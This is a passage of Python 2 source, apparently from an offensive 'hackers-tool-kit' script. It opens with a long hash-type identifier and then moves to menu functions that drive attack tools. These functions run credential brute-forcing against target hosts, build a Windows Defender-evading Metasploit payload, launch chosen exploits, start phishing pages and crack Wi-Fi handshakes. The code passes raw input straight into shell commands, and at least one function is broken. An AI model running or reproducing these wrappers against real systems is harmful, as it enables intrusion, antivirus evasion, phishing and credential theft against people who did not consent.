md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, 